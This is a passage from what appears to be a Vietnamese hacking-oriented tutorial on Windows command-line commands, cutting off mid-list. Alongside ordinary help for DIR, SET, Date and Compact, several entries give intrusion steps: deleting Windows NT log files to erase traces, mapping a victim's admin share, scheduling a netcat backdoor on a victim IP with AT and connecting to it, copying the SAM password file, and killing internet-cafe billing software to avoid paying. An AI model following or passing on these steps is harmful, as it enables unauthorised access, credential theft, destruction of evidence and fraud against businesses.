– Tham số -f : shutdown mà ko cảnh báo
– Tham số -c “comment” : lời cảnh báo trước khi shutdown
– Tham số -d up:xx:yy : ko rõ
Code:
shutdown \\ip (áp dụng win NT)
Để rõ hơn về lệnh shutdown bạn có thể gõ shutdown /? để được hướng dẫn cụ thể hơn!
Công dụng:
+ Shutdown máy tính.
11. Lệnh DIR :
Cú pháp:
DIR [drive:][path][filename]
Lệnh này quá căn bản rùi, chắc tui khỏi hướng dẫn, để rõ hơn bạn đánh lệnh DIR /? để được hướng dẫn.
Công dụng:
+ Để xem file, folder.
12. Lệnh DEL :
Cú pháp:
DEL [drive:][path][filename]
Lệnh này cũng căn bản rùi, ko phải nói nhìu.
Công dụng:
Xóa một file, thông thường sau khi xâm nhập vào hệ thống, ta phái tiến hành xóa dấu vết của mình để khỏi bị phát hiện.Sau đây là những files nhật ký của Win NT:
Code:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
Lệnh này khá nguy hiểm khi máy bạn bị xâm nhập
13. Lệnh tạo ổ đĩa ảo trên computer:
Cú pháp:
Net use z: \\ip\C$ ( hoặc là IPC$ )
– Z là của mình…còn C$ là của Victim
Công dụng:
Tạo 1 đĩa ảo trên máy tính (lệnh này tui ko rõ nên ko thể hướng dẫn chi tiết đc)
14. Lệnh Net Time :
Cú pháp:
Net Time \\ip
Công dụng:
+ Cho ta biết thời gian của victim, sau đó dùng lệnh AT để khởi động chương trình.
15. Lệnh AT:
Cú pháp:
AT \\ip
Công dụng:
+ Thông thường khi xâm nhập vào máy tính victim khi rút lui thì ta sẽ tặng quà lưu niệm lên máy tính victim, khi đã copy troj hoặc backdoor lên máy tính rùi ta sẽ dùng lệnh at để khởi động chúng.
Ví dụ: ở đây tui có con troj tên nc.exe (NC là từ viết tắc của NETCAT….nó là một telnet server với port 99) và đc copy lên máy victim rùi. Đầu tiên ta cần biết thời gian của victim có IP là : 68.135.23.25 .
Code:
Net Time \\68.135.23.25
Bây h nó sẽ phản hồi cho ta thời gian của victim, ví dụ : 12:00.
Code:
AT \\68.135.23.25 12:3 nc.exe
Đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99.
16. Lệnh Telnet:
Cú pháp:
telnet host port
Gõ telnet /? để biết thêm chi tiết. Nhưng nếu như máy victim đã dính con nc rồi thì ta chỉ cần connect đến port 99 là OKie
Code:
telnet 68.135.23.25 99
Công dụng:
+ Kết nối đến host qua port xx
17. Lệnh COPY:
Cú pháp:
COPY /?
Dùng lệnh trên để rõ hơn!
Công dụng:
+ Copy file, tui khỏi nói thêm nhé.
Ví dụ:chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1
Code:
Copy Index.html \\127.0.0.1\C$\index.html
nếu bạn copy lên folder winNt
Code:
Copy index.html \\127.0.0.1\admin$\index.html
muốn copy files trên máy victm thì bạn gõ vào :
Code:
Copy \\127.0.0.1\Admin$\repair\sam._c:\
18. Lệnh SET:
Cú pháp:
SET
Công dụng:
+ Displays, sets, or removes cmd.exe enviroment variables.
19. Lệnh Nbtstat:
Cú pháp:
Nbtstat /?
Gõ lệnh trên để rõ hơn về lệnh này.
Công dụng:
+ Display protocol statistic and curent TCP/IP connections using NBT (netbios over TCP?IP)
20. Lệnh Date :
Cú pháp:
Date /T
Công dụng:
+ Nếu chỉ gõ lệnh date thì hệ thống sẽ hiển thị ngày giờ hệ thống và yêu cầu bạn nhập ngày giờ mới để edit.
+ Nếu gõ lệnh date /t thì bạn chỉ coi thông tin về ngày giờ hệ thống!
21. Lệnh xuất thông tin thành file *.txt:
Cú pháp:
Câu lệnh >[drive]:\[path]\tenfile.txt
Công dụng:
+ xuất một tham số nào đó ra 1 file text .
Ví dụ: bạn đánh lệnh sau:
Code:
ipconfig >C:\myip.txtHệ thống sẽ tạo ra file myip.txt lưu ở ổ đĩa C với thông tin là IP, Gateway, Subnet Mask
22. Lệnh openfiles:
Cú pháp:
OpenFiles /Disconnect /ID id hoặc OpenFiles /Disconnect /A tên-truy-cập
Công dụng:
+ Cho biết ai đang dùng các tập tin (thư mục) mà bạn đang chia sẽ trên hệ thống mạng
23. Lệnh Recover:
Cú pháp:
Recover /?Đánh lệnh recover /? để biết thêm chi tiết nhé!
Công dụng:
+ Để “cứu” một file nào đó bị hỏng khi file đó nằm trên vùng đĩa hư (bad sector chăng hạn). Chỉ hoạt động khi hệ thống file của bạn là NTFS (Fat32/Fat không dùng được đâu nhé). Nó dở 1 chỗ là dùng lệnh này cho từng file một nên có nhiều file hư các bạn nên tìm tiện ích của các hãng thứ 3
24. Lệnh Tasklist :
Cú pháp:
Tasklist
Công dụng:
+ Liệt kê các tác vụ (các chương trình ứng dụng đang chạy trong bộ nhớ máy tính) chi tiết. Sẽ cho bạn biết tên process đang chạy. Process là một luồng xử lý được CPU cấp riêng khi thực thi một ứng dụng (chương trình) hay PID (Process ID). TaskList hữu ích khi dùng với Taskkill.
+ Để hiểu rõ hơn về lệnh này, hãy gõ /? sau cấu trúc lệnh nhé!
25. Lệnh Taskkill:
Cú pháp:
Taskkill /PID proccess id
Đừng quên thêm /? sau cấu trúc lệnh để hiểu rõ hơn nhé!
Công dụng:
+ Để “kill” một “task” đang chạy trong bộ nhớ. Lợi hại lắm đấy, khi ra net gặp quán nào nó cái DWK hay Netcafe thì mình tắt nó đi cái một!
Ví dụ:
Đầu tiên ta dùng lệnh tasklist để biết được groccess id của chương trình cần tắt.
Code:
tasklist
Ở đây tôi thí dụ như tôi cần DWK có groccess id là 524 thì ta dùng lệnh taskkill để tắt nó đi như sau:
Code:
taskkill /PID 524 /f
tham số /f là để tắt ứng dụng đó đi một cách hoàn toàn! Gọi là tắt hoàn toàn vậy thui chứ minh run hoặc khởi đọng lại là nó vẫn chạy bình thường ah! Lợi dụng ứng dụng này ta có thể làm giảm bớt chi phí ngồi net bằng cách tắt easy cafe đi. Chừng nào gần về rùi hãy mở lại hoặc nhấn nút reset là xong! He he! Nhưng nhớ phải làm cho khéo kẻo bị đập đó!
26. Lệnh Compact:
Cú pháp:
Compact [/c] [/u] [/s] [/a] [/i] [/f] [/q] – tham số /c : chỉ định nén một file nào đó
– tham số /u : giải nén một file nào đó
– Các tham số còn lại tự ngâm cứu thêm nhé!
Công dụng:
+ Tương tự như chức năng tiết kệm dung lượng đĩa trên Windows XP hay 2003 (Vista) – chỉ có khi dùng NTFS là “Compress Contents To Save Disk Space”. Các bạn có nhiều kiểu làm như click phải chuột vào một file chọn Properties -> Advanced rồi check vào ô tiết kiệm dung lượng cho file này “Compress file to save disk space”. Nhưng khi các bánj muốn nén tất các file có phần mở rộng là *.* thì Compact là lựa chọn tốt nhất .
Ví dụ:
compact /c *.exe27.
27. Lệnh control:
Cú pháp:
<span class=